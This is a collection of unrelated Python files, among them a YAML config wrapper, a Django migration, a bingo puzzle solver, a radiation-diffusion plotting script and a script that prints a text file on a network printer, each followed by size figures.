self.data = yaml.round_trip_load(fh, version=(1, 2))
def reload(self):
self.unload()
self.load()
def unload(self):
self.data.clear()
def save(self):
if not self.mutable:
raise RuntimeError("You may not modify a defaults file at runtime - check the mutable attribute!")
with open(self.path, "w") as fh:
yaml.round_trip_dump(self.data, fh)
# region: CommentedMap functions
def insert(self, pos, key, value, *, comment=None):
"""
Insert a `key: value` pair at the given position, attaching a comment if provided
Wrapper for `CommentedMap.insert()`
"""
return self.data.insert(pos, key, value, comment)
def add_eol_comment(self, comment, *, key=NoComment, column=30):
"""
Add an end-of-line comment for a key at a particular column (30 by default)
Wrapper for `CommentedMap.yaml_add_eol_comment()`
"""
# Setting the column to None as the API actually defaults to will raise an exception, so we have to
# specify one unfortunately
return self.data.yaml_add_eol_comment(comment, key=key, column=column)
def set_comment_before_key(self, key, comment, *, indent=0):
"""
Set a comment before a given key
Wrapper for `CommentedMap.yaml_set_comment_before_after_key()`
"""
return self.data.yaml_set_comment_before_after_key(
key, before=comment, indent=indent, after=None, after_indent=None
)
def set_start_comment(self, comment, indent=0):
"""
Set the starting comment
Wrapper for `CommentedMap.yaml_set_start_comment()`
"""
return self.data.yaml_set_start_comment(comment, indent=indent)
# endregion
# region: Dict functions
def clear(self):
return self.data.clear()
def copy(self):
return self.data.copy()
def get(self, key, default=None):
return self.data.get(key, default)
def items(self):
return self.data.items()
def keys(self):
return self.data.keys()
def pop(self, key, default=None):
return self.data.pop(key, default)
def popitem(self):
return self.data.popitem()
def setdefault(self, key, default=None):
if key not in self.data:
self.data[key] = default
return default
return self.data[key]
def update(self, other):
return self.data.update(other)
def values(self):
return self.data.values()
# endregion
# Item access functions
def __contains__(self, key):
"""
Wrapper for `dict.__contains__()`
"""
return self.data.__contains__(key)
def __delitem__(self, key):
"""
Wrapper for `dict.__delitem__()`
"""
del self.data[key]
def __getitem__(self, key):
"""
Wrapper for `dict.__getitem__()`
"""
return self.data.__getitem__(key)
def __iter__(self):
"""
Wrapper for `dict.__iter__()`
"""
return self.data.__iter__()
def __len__(self):
"""
Wrapper for `dict.__len__()`
"""
return self.data.__len__()
def __setitem__(self, key, value):
"""
Wrapper for `dict.__getitem__()`
"""
return self.data.__setitem__(key, value)
| 4,727 | 1,428 |
from .autoencoder.models import AE_Conv4_FC3, AE_Conv5_FC3
from .cnn.models import Conv4_FC3, Conv5_FC3, Stride_Conv5_FC3, resnet18
from .cnn.random import RandomArchitecture
from .vae.vanilla_vae import (
Vanilla3DdenseVAE,
Vanilla3DVAE,
VanillaDenseVAE,
VanillaSpatialVAE,
)
| 293 | 130 |
# Generated by Django 2.2.15 on 2020-10-05 07:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0005_auto_20180411_2311'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='nickname',
),
migrations.AddField(
model_name='profile',
name='displayname',
field=models.CharField(blank=True, help_text='显示姓名', max_length=32, null=True, verbose_name='显示姓名'),
),
migrations.AddField(
model_name='profile',
name='trainee_type',
field=models.IntegerField(choices=[(0, '实习医生'), (1, '住院医师'), (2, '进修医生')], default=0, help_text='学员身份', verbose_name='学员身份'),
),
]
| 804 | 305 |
import re
def mark(number, board):
for row in board:
for element in row:
if element[0] == number:
element[1] = True
def check(board):
# check rows
for row in board:
if all([e[1] == True for e in row]):
return True
# check columns
for colIndex in range(len(board)):
if all([board[rowIndex][colIndex][1] for rowIndex in range(len(board))]):
return True
return False
def sumUnmarked(board):
return sum([e[0],0][e[1]] for row in board for e in row)
def solve():
with open('4.input') as inputFile:
lines = inputFile.readlines()
numbers = map(int, lines[0].split(','))
boards = []
boardLines = []
for line in lines[2:]:
if len(line) == 1:
boards += [boardLines]
boardLines = []
continue
lineNumbers = [[x,False] for x in map(int,[line[0:2], line[3:5], line[6:8], line[9:11], line[12:14]])]
boardLines += [lineNumbers]
boards += [boardLines]
for number in numbers:
for board in boards:
mark(number, board)
if check(board):
# calculate result
# sum of all unmarked numbers
s = sumUnmarked(board)
# multiply that sum by the number that was just called
print(s*number)
return
solve()
| 1,492 | 426 |
# from sanic_restful import reqparse, Resource
# from scheduler_service.api import mongo_db
# url_parse = reqparse.RequestParser()
# url_parse.add_argument("name") | 165 | 52 |
#!/usr/bin/env python
# © 2022. Triad National Security, LLC. All rights reserved. This
# program was produced under U.S. Government contract
# 89233218CNA000001 for Los Alamos National Laboratory (LANL), which
# is operated by Triad National Security, LLC for the U.S. Department
# of Energy/National Nuclear Security Administration. All rights in
# the program are reserved by Triad National Security, LLC, and the
# U.S. Department of Energy/National Nuclear Security
# Administration. The Government is granted for itself and others
# acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
# license in this material to reproduce, prepare derivative works,
# distribute copies to the public, perform publicly and display
# publicly, and to permit others to do so.
import sys
import numpy as np
import matplotlib as mpl
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import glob
import argparse
from parthenon_tools import phdf
# Boosted diffusion solution for given frame 3-velocity and opacity
# initial time and position in boosted frame are t0p and x0p
# x and t are position in time in the observer frame, returns J at
# these position
def BoostedDiffusion(kappa, x0p, v, t0p, J0, x, t):
gamma = 1/np.sqrt(1-v*v)
tp = gamma*(t - v*x)
xp = gamma*(x - v*t)
return J0*np.sqrt(t0p/tp)*np.exp(-3*kappa*(xp-x0p)**2/(4*tp))
parser = argparse.ArgumentParser(description='Plot a boosted diffusion wave.')
parser.add_argument('-f', '--files', dest='files', nargs='*', default='rad_adv*.phdf', help='List of input Parthenon hdf files to plot')
parser.add_argument('-o', '--out', dest='out_file', default='rad_adv_J.pdf', help='Plot output file')
# Set the parameters defining the initial conditions
# Defaults should be consistent with inputs/radiation_advection.pin
parser.add_argument('-v', dest='v', default=0.3, action="store", type=float)
parser.add_argument('-k', '--kappa', dest='kappa', default=1e3, action="store", type=float,
help='Background opacity in comoving frame')
parser.add_argument('-s', '--sigma', dest='sigma', default=0.03333, action="store", type=float,
help='Initial spread of gaussian pulse in comoving frame')
parser.add_argument('--J0', dest='J0', default=1.0, action="store", type=float,
help='Height of pulse at t=t0 in comoving frame')
parser.add_argument('--savefig', type=bool, default=True, help='Whether to save figure')
parser.add_argument('--analytic', type=bool, default=True, help='Whether to include analytic boosted diffusion in plot')
args = parser.parse_args()
v = args.v
kappa = args.kappa
sigma = args.sigma
J0 = args.J0
# Calculate the initial time in the primed frame based on the initial spread
# since at t=0 J \propto \delta(x)
t0p = 3/2*kappa*sigma**2
# Initial time in the observer frame is defined to be equal to the initial
# time in the co-moving frame
t0 = t0p
# Get the central position of the gaussian in the observer frame at t0
x0p = (0.5 - v*t0)/np.sqrt(1-v*v)
# Lorentz factor
W = 1/np.sqrt(1-v*v)
# Read in the files
files = []
for file in args.files:
files += glob.glob(file)
files = sorted(files)
# Set up unit conversions
file0 = phdf.phdf(files[0])
L_unit = file0.Params['phoebus/LengthCodeToCGS']
T_unit = file0.Params['phoebus/TimeCodeToCGS']
M_unit = file0.Params['phoebus/MassCodeToCGS']
scale_free = True
if not np.isclose(L_unit, 1.) or not np.isclose(T_unit, 1.) or not np.isclose(M_unit, 1.):
scale_free = False
E_unit = M_unit*L_unit**2/T_unit**2
UE_unit = E_unit / L_unit**3
J0 *= UE_unit
# Find the minimum and maximum times of the data
minTime = sys.float_info.max
maxTime = -sys.float_info.max
for file in files:
dfile = phdf.phdf(file)
minTime = min([dfile.Time, minTime])
maxTime = max([dfile.Time, maxTime])
maxTime = max([maxTime, minTime + 0.01])
# Set up the axes with a time colorbar
cmap = cm.get_cmap('viridis')
fig = plt.figure(figsize=[20,8])
plt_ax = fig.add_axes([0.15, 0.15, 0.68, 0.8])
c_map_ax = fig.add_axes([0.86, 0.2, 0.03, 0.7])
mpl.colorbar.ColorbarBase(c_map_ax, cmap=cmap,
norm=mpl.colors.Normalize(minTime, maxTime),
orientation = 'vertical',
label='Time')
# Plot the data (should work for refinement, but untested)
# Choose the species and y and z locations
# ispec currently has to be fixed to 0 because of tensor issues in Parthenon output
ispec = 0
iz = 0
iy = 0
for file in files[0::1]:
dfile = phdf.phdf(file)
J = dfile.Get("r.p.J", flatten=False)*UE_unit
x = dfile.x*L_unit
t = dfile.Time
if (t>maxTime): continue
color = cmap((t - minTime)/(maxTime - minTime))
for block in range(dfile.NumBlocks):
plt_ax.plot(x[block, :], J[block, iz, iy, :, ispec], color=color)
xmin = np.amin(x)
xmax = np.amax(x)
xgrid = np.arange(xmin, xmax, (xmax-xmin)/1000)
tdiff = t + t0
if args.analytic:
plt_ax.plot(xgrid, BoostedDiffusion(kappa, x0p, v, t0p, J0, xgrid/L_unit, t + t0p), linestyle='--', color='k')
xl = v*L_unit # 0.3
xh = 1.0*L_unit
yl = -0.1
yh = 1.05*J0
if scale_free:
plt_ax.set_ylabel('J (arb. units)')
plt_ax.set_xlabel('x (arb. units)')
else:
plt_ax.set_ylabel('J (erg cm^-3)')
plt_ax.set_xlabel('x (cm)')
plt_ax.set_xlim([xl, xh])
plt_ax.set_ylim([yl, yh])
etot = sum(J[0, iz, iy, :, ispec])
print("etot: ", etot)
plt_ax.text(0.05*(xh-xl)+xl, 0.95*(yh-yl)+yl, '$\kappa={}$'.format(kappa))
if args.savefig:
plt.savefig(args.out_file)
else:
plt.show()
| 5,509 | 2,074 |
"""
Konfigurace Django aplikace admin.
"""
from django.apps import AppConfig
class AdminConfig(AppConfig):
name = "admin"
verbose_name = "ÚPadmin"
| 157 | 54 |
# Import libraries BrotherPrint and socket
from brotherprint import BrotherPrint
import socket
# Establish socket connection
f_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f_socket.connect(("172.16.133.157", 9100)) # Supply IP address of printer and port (default 9100)
printjob = BrotherPrint(f_socket) # Create a print job
# Editing the print job
printjob.command_mode()
printjob.initialize()
printjob.bold('on')
#printjob.send("Printed from Python program") # Pass string that needs to be printed
#printjob.print_page("full") # Print mode. Options: 'full', 'half', 'special' etc.
# To print from a file
f1 = open ('/home/student/Desktop/print.txt', 'r')
text = f1.read()
printjob.send(text)
printjob.print_page("full")
| 764 | 268 |